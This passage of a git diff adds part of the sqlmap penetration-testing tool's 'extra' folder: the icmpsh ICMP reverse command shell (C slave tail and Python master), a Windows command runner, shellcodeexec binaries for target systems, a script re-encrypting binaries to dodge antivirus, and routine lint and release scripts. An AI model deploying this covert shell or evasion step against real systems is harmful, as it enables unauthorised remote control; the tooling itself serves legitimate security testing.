+ target = argv[opt + 1]; + } + break; + case 'd': + if (opt + 1 < argc) { + delay = atol(argv[opt + 1]); + } + break; + case 'o': + if (opt + 1 < argc) { + timeout = atol(argv[opt + 1]); + } + break; + case 'r': + status = STATUS_SINGLE; + break; + case 'b': + if (opt + 1 < argc) { + max_blanks = atol(argv[opt + 1]); + } + break; + case 's': + if (opt + 1 < argc) { + max_data_size = atol(argv[opt + 1]); + } + break; + default: + printf("unrecognized option -%c\n", argv[1][0]); + usage(*argv); + return -1; + } + } + } + + if (!target) { + printf("you need to specify a host with -t. Try -h for more options\n"); + return -1; + } + ip_addr = to_ip(target); + + // don't spawn a shell if we're only sending a single test request + if (status != STATUS_SINGLE) { + status = spawn_shell(&pi, &pipe_read, &pipe_write); + } + + // create icmp channel + create_icmp_channel(&icmp_chan); + if (icmp_chan == INVALID_HANDLE_VALUE) { + printf("unable to create ICMP file: %u\n", GetLastError()); + return -1; + } + + // allocate transfer buffers + in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + if (!in_buf || !out_buf) { + printf("failed to allocate memory for transfer buffers\n"); + return -1; + } + memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + + // sending/receiving loop + blanks = 0; + do { + + switch(status) { + case STATUS_SINGLE: + // reply with a static string + out_buf_size = sprintf(out_buf, "Test1234\n"); + break; + case STATUS_PROCESS_NOT_CREATED: + // reply with error message + out_buf_size = sprintf(out_buf, "Process was not created\n"); + break; + default: + // read data from process via pipe + out_buf_size = 0; + if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { + if (out_buf_size > 0) { + out_buf_size = 0; + rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); + if (!rs && GetLastError() != ERROR_IO_PENDING) { + out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); + } + } + } else { + out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); + } + break; + } + + // send request/receive response + if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { + if (status == STATUS_OK) { + // write data from response back into pipe + WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); + } + blanks = 0; + } else { + // no reply received or error occured + blanks++; + } + + // wait between requests + Sleep(delay); + + } while (status == STATUS_OK && blanks < max_blanks); + + if (status == STATUS_OK) { + TerminateProcess(pi.hProcess, 0); + } + + return 0; +} + diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh.exe_ b/src/sqlmap-master/extra/icmpsh/icmpsh.exe_ new file mode 100644 index 0000000..a909351 Binary files /dev/null and b/src/sqlmap-master/extra/icmpsh/icmpsh.exe_ differ diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh_m.py b/src/sqlmap-master/extra/icmpsh/icmpsh_m.py new file mode 100644 index 0000000..17370fd --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/icmpsh_m.py @@ -0,0 +1,144 @@ +#!/usr/bin/env python +# +# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in +# Perl by Nico Leidecker ) +# +# Copyright (c) 2010, Bernardo Damele A. G. +# +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +import os +import select +import socket +import sys + +def setNonBlocking(fd): + """ + Make a file descriptor non-blocking + """ + + import fcntl + + flags = fcntl.fcntl(fd, fcntl.F_GETFL) + flags = flags | os.O_NONBLOCK + fcntl.fcntl(fd, fcntl.F_SETFL, flags) + +def main(src, dst): + if sys.platform == "nt": + sys.stderr.write('icmpsh master can only run on Posix systems\n') + sys.exit(255) + + try: + from impacket import ImpactDecoder + from impacket import ImpactPacket + except ImportError: + sys.stderr.write('You need to install Python Impacket library first\n') + sys.exit(255) + + # Make standard input a non-blocking file + stdin_fd = sys.stdin.fileno() + setNonBlocking(stdin_fd) + + # Open one socket for ICMP protocol + # A special option is set on the socket so that IP headers are included + # with the returned data + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) + except socket.error: + sys.stderr.write('You need to run icmpsh master with administrator privileges\n') + sys.exit(1) + + sock.setblocking(0) + sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + + # Create a new IP packet and set its source and destination addresses + ip = ImpactPacket.IP() + ip.set_ip_src(src) + ip.set_ip_dst(dst) + + # Create a new ICMP packet of type ECHO REPLY + icmp = ImpactPacket.ICMP() + icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) + + # Instantiate an IP packets decoder + decoder = ImpactDecoder.IPDecoder() + + while True: + try: + cmd = '' + + # Wait for incoming replies + if sock in select.select([sock], [], [])[0]: + buff = sock.recv(4096) + + if 0 == len(buff): + # Socket remotely closed + sock.close() + sys.exit(0) + + # Packet received; decode and display it + ippacket = decoder.decode(buff) + icmppacket = ippacket.child() + + # If the packet matches, report it to the user + if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): + # Get identifier and sequence number + ident = icmppacket.get_icmp_id() + seq_id = icmppacket.get_icmp_seq() + data = icmppacket.get_data_as_string() + + if len(data) > 0: + sys.stdout.write(data) + + # Parse command from standard input + try: + cmd = sys.stdin.readline() + except: + pass + + if cmd == 'exit\n': + return + + # Set sequence number and identifier + icmp.set_icmp_id(ident) + icmp.set_icmp_seq(seq_id) + + # Include the command as data inside the ICMP packet + icmp.contains(ImpactPacket.Data(cmd)) + + # Calculate its checksum + icmp.set_icmp_cksum(0) + icmp.auto_checksum = 1 + + # Have the IP packet contain the ICMP packet (along with its payload) + ip.contains(icmp) + + try: + # Send it to the target host + sock.sendto(ip.get_packet(), (dst, 0)) + except socket.error as ex: + sys.stderr.write("'%s'\n" % ex) + sys.stderr.flush() + except: + break + +if __name__ == '__main__': + if len(sys.argv) < 3: + msg = 'missing mandatory options. Execute as root:\n' + msg += './icmpsh-m.py \n' + sys.stderr.write(msg) + sys.exit(1) + + main(sys.argv[1], sys.argv[2]) diff --git a/src/sqlmap-master/extra/runcmd/README.txt b/src/sqlmap-master/extra/runcmd/README.txt new file mode 100644 index 0000000..4d4caa8 --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/README.txt @@ -0,0 +1,3 @@ +runcmd.exe is an auxiliary program that can be used for running command prompt +commands skipping standard "cmd /c" way. It is licensed under the terms of the +GNU Lesser General Public License. diff --git a/src/sqlmap-master/extra/runcmd/runcmd.exe_ b/src/sqlmap-master/extra/runcmd/runcmd.exe_ new file mode 100644 index 0000000..556eabb Binary files /dev/null and b/src/sqlmap-master/extra/runcmd/runcmd.exe_ differ diff --git a/src/sqlmap-master/extra/runcmd/src/README.txt b/src/sqlmap-master/extra/runcmd/src/README.txt new file mode 100644 index 0000000..b75508d --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/README.txt @@ -0,0 +1,4 @@ +Compile only the Release version because the Runtime library option +(Project Properties -> Configuration Properties -> C/C++ -> Code +Generation) is set to "Multi-threaded (/MT)", which statically links +everything into executable and doesn't compile Debug version at all. diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd.sln b/src/sqlmap-master/extra/runcmd/src/runcmd.sln new file mode 100644 index 0000000..0770582 --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/runcmd.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 9.00 +# Visual Studio 2005 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp new file mode 100644 index 0000000..743f2a2 --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp @@ -0,0 +1,46 @@ +/* + runcmd - a program for running command prompt commands + Copyright (C) 2010 Miroslav Stampar + email: miroslav.stampar@gmail.com + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA +*/ + +#include +#include +#include +#include "stdafx.h" +#include + +using namespace std; +int main(int argc, char* argv[]) +{ + FILE *fp; + string cmd; + + for( int count = 1; count < argc; count++ ) + cmd += " " + string(argv[count]); + + fp = _popen(cmd.c_str(), "r"); + + if (fp != NULL) { + char buffer[BUFSIZ]; + + while (fgets(buffer, sizeof buffer, fp) != NULL) + fputs(buffer, stdout); + } + + return 0; +} diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.vcproj b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.vcproj new file mode 100644 index 0000000..928c716 --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.vcproj @@ -0,0 +1,225 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.cpp b/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.cpp new file mode 100644 index 0000000..e191a91 --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// runcmd.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.h b/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.h new file mode 100644 index 0000000..0be0e6f --- /dev/null +++ b/src/sqlmap-master/extra/runcmd/src/runcmd/stdafx.h @@ -0,0 +1,17 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. +#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. +#endif + +#include +#include + + + +// TODO: reference additional headers your program requires here diff --git a/src/sqlmap-master/extra/shellcodeexec/README.txt b/src/sqlmap-master/extra/shellcodeexec/README.txt new file mode 100644 index 0000000..ad8fe34 --- /dev/null +++ b/src/sqlmap-master/extra/shellcodeexec/README.txt @@ -0,0 +1,4 @@ +Binary files in this folder are data files used by sqlmap on the target +system, but not executed on the system running sqlmap. They are licensed +under the terms of the GNU Lesser General Public License and their source +code is available on https://github.com/inquisb/shellcodeexec. diff --git a/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x32_ b/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x32_ new file mode 100644 index 0000000..c0857d9 Binary files /dev/null and b/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x32_ differ diff --git a/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x64_ b/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x64_ new file mode 100644 index 0000000..13ef752 Binary files /dev/null and b/src/sqlmap-master/extra/shellcodeexec/linux/shellcodeexec.x64_ differ diff --git a/src/sqlmap-master/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/src/sqlmap-master/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ new file mode 100644 index 0000000..0cbe540 Binary files /dev/null and b/src/sqlmap-master/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/src/sqlmap-master/extra/shutils/autocompletion.sh b/src/sqlmap-master/extra/shutils/autocompletion.sh new file mode 100644 index 0000000..edaccd7 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/autocompletion.sh @@ -0,0 +1,9 @@ +#/usr/bin/env bash + +# source ./extra/shutils/autocompletion.sh + +DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" +WORDLIST=`python "$DIR/../../sqlmap.py" -hh | grep -Eo '\s\--?\w[^ =,]*' | grep -vF '..' | paste -sd "" -` + +complete -W "$WORDLIST" sqlmap +complete -W "$WORDLIST" ./sqlmap.py diff --git a/src/sqlmap-master/extra/shutils/blanks.sh b/src/sqlmap-master/extra/shutils/blanks.sh new file mode 100644 index 0000000..04be57b --- /dev/null +++ b/src/sqlmap-master/extra/shutils/blanks.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Removes trailing spaces from blank lines inside project files +find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; diff --git a/src/sqlmap-master/extra/shutils/drei.sh b/src/sqlmap-master/extra/shutils/drei.sh new file mode 100644 index 0000000..2195d0a --- /dev/null +++ b/src/sqlmap-master/extra/shutils/drei.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Stress test against Python3 + +export SQLMAP_DREI=1 +#for i in $(find . -iname "*.py" | grep -v __init__); do python3 -c 'import '`echo $i | cut -d '.' -f 2 | cut -d '/' -f 2- | sed 's/\//./g'`''; done +for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3 -m compileall $i | sed 's/Compiling/Checking/g'; done +unset SQLMAP_DREI +source `dirname "$0"`"/junk.sh" + +# for i in $(find . -iname "*.py" | grep -v __init__); do timeout 10 pylint --py3k $i; done 2>&1 | grep -v -E 'absolute_import|No config file' diff --git a/src/sqlmap-master/extra/shutils/duplicates.py b/src/sqlmap-master/extra/shutils/duplicates.py new file mode 100644 index 0000000..8f09a59 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/duplicates.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Removes duplicate entries in wordlist like files + +from __future__ import print_function + +import sys + +if __name__ == "__main__": + if len(sys.argv) > 1: + items = list() + + with open(sys.argv[1], 'r') as f: + for item in f: + item = item.strip() + try: + str.encode(item) + if item in items: + if item: + print(item) + else: + items.append(item) + except: + pass + + with open(sys.argv[1], 'w+') as f: + f.writelines("\n".join(items)) diff --git a/src/sqlmap-master/extra/shutils/junk.sh b/src/sqlmap-master/extra/shutils/junk.sh new file mode 100644 index 0000000..30e8352 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/junk.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null +find . -name "*.pyc" -exec rm -f {} \; &>/dev/null diff --git a/src/sqlmap-master/extra/shutils/modernize.sh b/src/sqlmap-master/extra/shutils/modernize.sh new file mode 100644 index 0000000..d4c3da6 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/modernize.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# sudo pip install modernize + +for i in $(find . -iname "*.py" | grep -v __init__); do python-modernize $i 2>&1 | grep -E '^[+-]' | grep -v range | grep -v absolute_import; done diff --git a/src/sqlmap-master/extra/shutils/newlines.py b/src/sqlmap-master/extra/shutils/newlines.py new file mode 100644 index 0000000..fe28a35 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/newlines.py @@ -0,0 +1,30 @@ +#! /usr/bin/env python + +from __future__ import print_function + +import os +import sys + +def check(filepath): + if filepath.endswith(".py"): + content = open(filepath, "rb").read() + pattern = "\n\n\n".encode("ascii") + + if pattern in content: + index = content.find(pattern) + print(filepath, repr(content[index - 30:index + 30])) + +if __name__ == "__main__": + try: + BASE_DIRECTORY = sys.argv[1] + except IndexError: + print("no directory specified, defaulting to current working directory") + BASE_DIRECTORY = os.getcwd() + + print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY) + for root, dirs, files in os.walk(BASE_DIRECTORY): + if any(_ in root for _ in ("extra", "thirdparty")): + continue + for name in files: + filepath = os.path.join(root, name) + check(filepath) diff --git a/src/sqlmap-master/extra/shutils/postcommit-hook.sh b/src/sqlmap-master/extra/shutils/postcommit-hook.sh new file mode 100644 index 0000000..07d91a2 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/postcommit-hook.sh @@ -0,0 +1,34 @@ +#!/bin/bash + +: ' +cat > .git/hooks/post-commit << EOF +#!/bin/bash + +source ./extra/shutils/postcommit-hook.sh +EOF + +chmod +x .git/hooks/post-commit +' + +SETTINGS="../../lib/core/settings.py" +PYPI="../../extra/shutils/pypi.sh" + +declare -x SCRIPTPATH="${0}" + +FULLPATH=${SCRIPTPATH%/*}/$SETTINGS + +if [ -f $FULLPATH ] +then + LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE") + if [ -n "$NEW_TAG" ] + then + #git commit -am "Automatic monthly tagging" + echo "Creating new tag ${NEW_TAG}" + git tag $NEW_TAG + git push origin $NEW_TAG + echo "Going to push PyPI package" + /bin/bash ${SCRIPTPATH%/*}/$PYPI + fi +fi diff --git a/src/sqlmap-master/extra/shutils/precommit-hook.sh b/src/sqlmap-master/extra/shutils/precommit-hook.sh new file mode 100644 index 0000000..f030bea --- /dev/null +++ b/src/sqlmap-master/extra/shutils/precommit-hook.sh @@ -0,0 +1,42 @@ +#!/bin/bash + +: ' +cat > .git/hooks/pre-commit << EOF +#!/bin/bash + +source ./extra/shutils/precommit-hook.sh +EOF + +chmod +x .git/hooks/pre-commit +' + +PROJECT="../../" +SETTINGS="../../lib/core/settings.py" +DIGEST="../../data/txt/sha256sums.txt" + +declare -x SCRIPTPATH="${0}" + +PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT +SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +DIGEST_FULLPATH=${SCRIPTPATH%/*}/$DIGEST + +git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 + +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi + +cd $PROJECT_FULLPATH && git ls-files | sort | uniq | grep -Pv '^\.|sha256' | xargs sha256sum > $DIGEST_FULLPATH && cd - +git add "$DIGEST_FULLPATH" diff --git a/src/sqlmap-master/extra/shutils/pycodestyle.sh b/src/sqlmap-master/extra/shutils/pycodestyle.sh new file mode 100644 index 0000000..f527ed0 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/pycodestyle.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \; diff --git a/src/sqlmap-master/extra/shutils/pydiatra.sh b/src/sqlmap-master/extra/shutils/pydiatra.sh new file mode 100644 index 0000000..474b67a --- /dev/null +++ b/src/sqlmap-master/extra/shutils/pydiatra.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Runs py3diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except diff --git a/src/sqlmap-master/extra/shutils/pyflakes.sh b/src/sqlmap-master/extra/shutils/pyflakes.sh new file mode 100644 index 0000000..f59f5ba --- /dev/null +++ b/src/sqlmap-master/extra/shutils/pyflakes.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes3 '{}' \; | grep -v "redefines '_'" diff --git a/src/sqlmap-master/extra/shutils/pylint.sh b/src/sqlmap-master/extra/shutils/pylint.sh new file mode 100644 index 0000000..2ba470e --- /dev/null +++ b/src/sqlmap-master/extra/shutils/pylint.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \; diff --git a/src/sqlmap-master/extra/shutils/pypi.sh b/src/sqlmap-master/extra/shutils/pypi.sh new file mode 100644 index 0000000..240a70e --- /dev/null +++ b/src/sqlmap-master/extra/shutils/pypi.sh @@ -0,0 +1,183 @@ +#!/bin/bash + +if [ ! -f ~/.pypirc ]; then + echo "File ~/.pypirc is missing" + exit 1 +fi + +declare -x SCRIPTPATH="${0}" +SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py" +VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3) +TYPE=pip +TMP_DIR=/tmp/pypi +mkdir $TMP_DIR +cd $TMP_DIR +cat > $TMP_DIR/setup.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from setuptools import setup, find_packages + +setup( + name='sqlmap', + version='$VERSION', + description='Automatic SQL injection and database takeover tool', + long_description=open('README.rst').read(), + long_description_content_type='text/x-rst', + author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', + author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', + url='https://sqlmap.org', + project_urls={ + 'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki', + 'Source': 'https://github.com/sqlmapproject/sqlmap/', + 'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues', + }, + download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', + license='GNU General Public License v2 (GPLv2)', + packages=['sqlmap'], + package_dir={'sqlmap':'sqlmap'}, + include_package_data=True, + zip_safe=False, + # https://pypi.python.org/pypi?%3Aaction=list_classifiers + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'Natural Language :: English', + 'Operating System :: OS Independent', + 'Programming Language :: Python', + 'Environment :: Console', + 'Topic :: Database', + 'Topic :: Security', + ], + entry_points={ + 'console_scripts': [ + 'sqlmap = sqlmap.sqlmap:main', + ], + }, +) +EOF +wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip +unzip sqlmap.zip +rm sqlmap.zip +mv "sqlmap-$VERSION" sqlmap +cat > sqlmap/__init__.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import sys + +sys.dont_write_bytecode = True +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +EOF +cat > README.rst << "EOF" +sqlmap +====== + +|Python 2.6|2.7|3.x| |License| |Twitter| + +sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over +of database servers. It comes with a powerful detection engine, many +niche features for the ultimate penetration tester and a broad range of +switches lasting from database fingerprinting, over data fetching from +the database, to accessing the underlying file system and executing +commands on the operating system via out-of-band connections. + +Screenshots +----------- + +.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png + :alt: Screenshot + + +You can visit the `collection of +screenshots `__ +demonstrating some of features on the wiki. + +Installation +------------ + +You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: :: + + pip install --upgrade sqlmap + +Alternatively, you can download the latest tarball by clicking +`here `__ or +latest zipball by clicking +`here `__. + +If you prefer fetching daily updates, you can download sqlmap by cloning the +`Git `__ repository: + +:: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with +`Python `__ version **2.6**, **2.7** and +**3.x** on any platform. + +Usage +----- + +To get a list of basic options and switches use: + +:: + + sqlmap -h + +To get a list of all options and switches use: + +:: + + sqlmap -hh + +You can find a sample run `here `__. To +get an overview of sqlmap capabilities, list of supported features and +description of all options and switches, along with examples, you are +advised to consult the `user's +manual `__. + +Links +----- + +- Homepage: https://sqlmap.org +- Download: + `.tar.gz `__ + or `.zip `__ +- Commits RSS feed: + https://github.com/sqlmapproject/sqlmap/commits/master.atom +- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +- User's manual: https://github.com/sqlmapproject/sqlmap/wiki +- Frequently Asked Questions (FAQ): + https://github.com/sqlmapproject/sqlmap/wiki/FAQ +- X: https://twitter.com/sqlmap +- Demos: http://www.youtube.com/user/inquisb/videos +- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +.. |Python 2.6|2.7|3.x| image:: https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg + :target: https://www.python.org/ +.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg + :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE +.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg + :target: https://twitter.com/sqlmap + +.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md +.. http://rst.ninjs.org/ +EOF +sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py +sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py +for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done +python setup.py sdist bdist_wheel +twine check dist/* +twine upload --config-file=~/.pypirc dist/* +rm -rf $TMP_DIR diff --git a/src/sqlmap-master/extra/shutils/recloak.sh b/src/sqlmap-master/extra/shutils/recloak.sh new file mode 100644 index 0000000..557ea51 --- /dev/null +++ b/src/sqlmap-master/extra/shutils/recloak.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# NOTE: this script is for dev usage after AV something something + +DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P) + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done + +cd $DIR/../cloak +sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done + +git clean -f > /dev/null diff --git a/src/sqlmap-master/extra/shutils/strip.sh b/src/sqlmap-master/extra/shutils/strip.sh new file mode 100644 index 0000000..0fa81ef --- /dev/null +++ b/src/sqlmap-master/extra/shutils/strip.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/ +# http://www.muppetlabs.com/~breadbox/software/elfkickers.html +# 